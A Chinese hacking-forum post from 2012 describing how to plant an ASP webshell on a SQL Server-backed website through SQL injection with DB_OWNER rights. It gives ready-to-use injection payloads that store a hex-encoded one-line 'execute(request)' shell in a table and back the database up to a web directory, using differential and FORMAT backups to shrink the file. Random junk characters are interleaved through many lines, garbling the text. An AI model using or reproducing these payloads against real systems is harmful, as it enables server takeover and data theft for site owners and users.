找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2223|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:% l. c5 a" [$ v  F' b8 X  G% R
- c& q: A7 ~4 U) t  o3 x
减少备份文件大小,得到可执行的webshell成功率提高不少
& i1 N0 b# r) W+ j+ {2 @一利用差异备份
% V6 P! }: u2 U( y1 m加一个参数WITH DIFFERENTIAL7 \! F7 _0 X9 M- I& O

+ K. u" h. n' U% L9 |! _) q1
* d' q4 h& s4 ^6 ]! v2
: k; F' C' ^4 d, r: N3 c4 P! ^3
5 r+ n$ f, i# S% C" o4
1 b7 F# u2 ~0 Q declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
, y/ d5 S' a, Z3 W5 ucreate table [dbo].[xiaolu] ([cmd] [image]);- O6 y* i$ _  q1 z1 h
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)- G6 Z  ~/ q4 W( a  c4 T
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL $ r: f6 X. C& N5 e9 d& \! ~
& F+ M0 t3 T0 A5 i6 S: W
二利用完全FORMAT
7 m4 L9 y# g1 N加一个参数WITH FROMAT
, @- S# E. I9 m9 [有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以
: W3 P% z8 W1 C4 P* o0 n& s/ m* n% }- @3 e( @; p+ W
1
; x0 Y7 i0 x  A8 K5 _4 Y$ W8 |# C2
7 x4 I% C) H" A* x. Y- `; I33 u; T# x% b: d% E' J* C2 W0 E9 d
4, I& H+ a4 d7 ]9 K: @( B  w
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s+ ^3 _; L, `4 _" b4 K: M
create table [dbo].[xiaolu] ([cmd] [image]);
3 Q3 @# {7 z8 A3 r4 vinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
2 J7 B4 g. v/ R" e; Adeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT & A/ X6 u1 B0 Y* W7 M
. C1 K# M) G2 {( Y- q' {
总的来说就是那么简单几句,下面以备份数据库model为例子
/ \' Z" ?, |7 Q1/ @# x. `$ Q7 l4 M: r3 a

$ D2 W2 q+ Z, y0 t  X1
, B: b) t) e: _% s2 L id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2 a8 c0 o# q7 e% @- C) Z3 a+ w* w$ K( C
2
; L# D4 y6 T$ {* ^. N  l4 C: U- z( [6 `! _
17 Y, V! ]: t! @) L& T. B! d
id=1;backup database model to disk='你的路径‘ with differential,format;-- 1 `6 e) v0 [5 k
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表